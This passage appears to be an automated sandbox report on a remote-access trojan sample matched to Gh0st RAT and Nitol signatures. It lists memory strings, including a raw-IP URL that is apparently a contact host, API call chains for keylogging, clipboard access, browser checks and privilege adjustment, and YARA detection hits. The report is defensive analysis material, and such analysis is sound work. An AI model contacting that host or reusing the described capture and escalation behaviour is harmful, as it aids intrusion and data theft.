                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.000000000087B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://106.52.15.123/y
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946197866.00000000008D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2906139651.00000000007FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comU
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520615794.000000000065A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comg=ZY

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to capture and log keystrokes
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: <BackSpace>0_2_10004B31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: <Enter>0_2_10004B31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: <BackSpace>4_2_10004B31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: <Enter>4_2_10004B31
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00409850 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_mbscpy,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00409850
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00409850 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_mbscpy,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00409850
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_10001804 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_10001804
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_00409850 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_mbscpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00409850
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_10001804 strlen,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_10001804
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_004093DE OpenClipboard,GetClipboardData,GlobalLock,strlen,GlobalUnlock,CloseClipboard,0_2_004093DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040CB7D memset,Sleep,lstrlen,memset,memset,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrlen,lstrcat,memset,lstrcat,0_2_0040CB7D
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_6c2b514b-0
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_f738f4da-c
                Source: Yara matchFile source: 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Checks if browser processes are running
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command0_2_100058CF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command4_2_100058CF

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 4.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.40804c.1.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Nitol Malware Author: Florian Roth
                Source: 5.2.SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe.10000000.2.unpack, type: UNPACKEDPEMatched rule: Detects Nitol backdoor Author: ditekSHen
                Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTRMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTRMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTRMatched rule: Identifies a variant of Gh0st Rat Author: unknown
                PE file has a writeable .text section
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025536D9 NtQueryVirtualMemory,0_2_025536D9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027B27AD NtQueryVirtualMemory,4_2_027B27AD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_10001503: memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,0_2_10001503
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040DED2 OpenSCManagerA,OpenServiceA,DeleteService,GetSystemDirectoryA,lstrcat,DeleteFileA,exit,0_2_0040DED2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00410FA6 memset,memset,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CreateProcessAsUserA,FreeLibrary,0_2_00410FA6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040D25D ExitWindowsEx,0_2_0040D25D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0040954F memcpy,CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,0_2_0040954F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_10005211 ExitWindowsEx,0_2_10005211
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_10001503 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,0_2_10001503
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0040D25D ExitWindowsEx,4_2_0040D25D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0040954F memcpy,CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,4_2_0040954F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_10005211 ExitWindowsEx,4_2_10005211
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_10001503 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit,4_2_10001503
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile created: C:\Windows\SysWOW64\Default.keyJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_004782B80_2_004782B8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0047767F0_2_0047767F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_10005F590_2_10005F59
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A634A0_2_022A634A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BA3520_2_022BA352
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A33AB0_2_022A33AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BE0230_2_022BE023
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022B8BDF0_2_022B8BDF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022CC8F60_2_022CC8F6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022BD9840_2_022BD984
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248F2D70_2_0248F2D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024926570_2_02492657
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247A7090_2_0247A709
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248BACC0_2_0248BACC
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0252C24C0_2_0252C24C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0247C2890_2_0247C289
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025282B60_2_025282B6
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0254330A0_2_0254330A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248C3F00_2_0248C3F0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0254A3BD0_2_0254A3BD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253905D0_2_0253905D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025290430_2_02529043
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024FF0030_2_024FF003
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025460D70_2_025460D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0254216E0_2_0254216E
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0254B10D0_2_0254B10D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024AB1170_2_024AB117
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0254A1200_2_0254A120
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025051C90_2_025051C9
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025011870_2_02501187
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024C91900_2_024C9190
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0248C1970_2_0248C197
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0254A6770_2_0254A677
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253A6630_2_0253A663
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025136EF0_2_025136EF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025426800_2_02542680
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025256AF0_2_025256AF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0254D7450_2_0254D745
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0254B7410_2_0254B741
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025437630_2_02543763
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_024C07030_2_024C0703
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_025567020_2_02556702
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_0253F7390_2_0253F739
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A960B0_2_022A960B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_022A7CE50_2_022A7CE5
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_004782B84_2_004782B8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0047767F4_2_0047767F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_10005F594_2_10005F59
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0238E7064_2_0238E706
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_023A241D4_2_023A241D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_023934AB4_2_023934AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_02393B4A4_2_02393B4A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0238FE794_2_0238FE79
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0237BE714_2_0237BE71
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_02378ED24_2_02378ED2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026EE3AB4_2_026EE3AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026F172B4_2_026F172B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026D97DD4_2_026D97DD
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026EABA04_2_026EABA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026EB26B4_2_026EB26B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027282644_2_02728264
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0276025B4_2_0276025B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A12424_2_027A1242
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0276429D4_2_0276429D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026DB35D4_2_026DB35D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0278B3204_2_0278B320
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A23DE4_2_027A23DE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0278738A4_2_0278738A
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026ED00B4_2_026ED00B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027B50114_2_027B5011
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0275E0D74_2_0275E0D7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A20B14_2_027A20B1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027AA0B44_2_027AA0B4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027981314_2_02798131
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027881174_2_02788117
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A91F44_2_027A91F4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0270A1EB4_2_0270A1EB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027AA1E14_2_027AA1E1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A51AB4_2_027A51AB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0277C66B4_2_0277C66B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026F764B4_2_026F764B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026AE6404_2_026AE640
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0272F6484_2_0272F648
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_026AE63D4_2_026AE63D
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027AA61C4_2_027AA61C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_0276960B4_2_0276960B
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_027A17544_2_027A1754
